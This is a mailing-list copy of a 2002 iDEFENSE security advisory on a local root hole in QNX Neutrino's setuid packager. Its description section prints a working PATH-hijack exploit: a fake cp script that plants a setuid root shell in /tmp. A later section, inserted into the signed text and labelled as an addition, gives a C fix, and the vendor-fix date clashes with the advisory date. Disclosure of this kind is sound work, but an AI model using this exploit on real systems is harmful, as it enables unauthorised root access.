Message-ID: <3DCBE076.10587.1833B774@localhost>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory 11.08.02b: Non-Explicit Path Vulnerability in QNX Neutrino RTOS

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 11.08.02b:
http://www.idefense.com/advisory/11.08.02b.txt
Non-Explicit Path Vulnerability in QNX Neutrino RTOS
November 8, 2002

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
operating system designed for use in embedded systems. "Companies
worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on
the QNX technology for network routers, medical devices, intelligent
transportation systems, safety and security systems, next-generation
robotics, and other mission-critical applications. In addition, QNX
forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an
engineering concept vehicle. The new system supports the development
of next-generation in-car communications, infotainment, and
telematics applications." More information is available at
http://www.qnx.com/products/ps_neutrino .

II. DESCRIPTION

Since a setuid root application packager within QNX inappropriately
executes external applications without using their full paths, local
attackers can potentially obtain root privilege. The following is a
sample exploit (with comments):

The packager will at one point call the copy binary (cp). The first
step is to create a tainted copy command and ensure it is executable.
This copy command will copy a shell to /tmp and give the shell setuid
privilege:

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp 

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH 

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
-rwsr-xr-x 1 root 100 153908 May 11 05:36 /tmp/sh

III. ANALYSIS

Local attackers who exploit this vulnerability can potentially gain
total control over a targeted system. Because exploitation must be
done locally, it is less likely that damage can be done quickly or in
a widespread fashion. Still, for organizations that may still be
using QNX, insider threat remains a real danger.

IV. DETECTION

QNX Neutrino RTOS 6.2.0 is affected. Re-create the above-described
exploit scenario to determine the susceptibility of an RTOS
implementation.

V. WORKAROUND

Use the command chmod -s `which packager` to remove the setuid bit
from the packager binary.
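
Added example (not part of the iDEFENSE advisory and not QNX's code):
the root cause in Section II is a privileged program starting a helper
by bare name, so the caller's PATH decides what runs. The sketch below
shows the developer-side fix, with hypothetical names run_trusted and
clean_env and /bin/sh standing in for the helper.

```c
/* Added example, not QNX code: start a helper from a privileged program
 * without consulting the caller's PATH. run_trusted and clean_env are
 * hypothetical names. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child; nothing is inherited from the caller. */
static char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };

/* Returns the helper's exit status, or -1 if the path is not absolute,
 * fork() fails, or the helper does not exit normally. */
int run_trusted(const char *abs_path, char *const argv[])
{
    pid_t pid;
    int status;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;              /* refuse bare names such as "cp" */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() uses the path as given and never searches PATH,
         * unlike system(), popen(), execlp() and execvp(). */
        execve(abs_path, argv, clean_env);
        _exit(127);             /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed demo: the caller's PATH is poisoned, the child's is not. */
    char *check[] = { "sh", "-c", "[ \"$PATH\" = /bin:/usr/bin ]", NULL };

    setenv("PATH", "/tmp/untrusted:/bin", 1);
    printf("child PATH clean: %d\n", run_trusted("/bin/sh", check) == 0);
    printf("bare name refused: %d\n", run_trusted("cp", check) == -1);
    return 0;
}
```

The fixed child environment matters as much as the absolute path: the
helper may itself start other programs by name.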

VI. VENDOR FIX

QNX Neutrino RTOS 6.2.1, which is slated to be released in January
2002, should fix this vulnerability. According to QNX, concerned
customers can contact their sales rep for an advance copy.
 
VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1239 to this issue.

VIII. DISCLOSURE TIMELINE

10/02/2002	Issue disclosed to iDEFENSE
10/31/2002	QNX notified (support@....com)
10/31/2002	iDEFENSE clients notified
11/01/2002	Response received from Marcin Dzieciol (marcind@....com)
11/07/2002	Response received from Rodney Dowdell
11/08/2002	Phone conversation with Barry Faubert, Tech Support
11/08/2002	Public disclosure

IX. CREDIT

Texonet (http://www.texonet.com) discovered this vulnerability.


Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@...fense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


-dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@...fense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA+AwUBPcwmZUrdNYRLCswqEQIZkQCYq0OO58lTS6Ib+q26PSx085XXqgCfWPhd
F5wgy3retkUyneTrZbtG4pk=
=rZxj
-----END PGP SIGNATURE-----

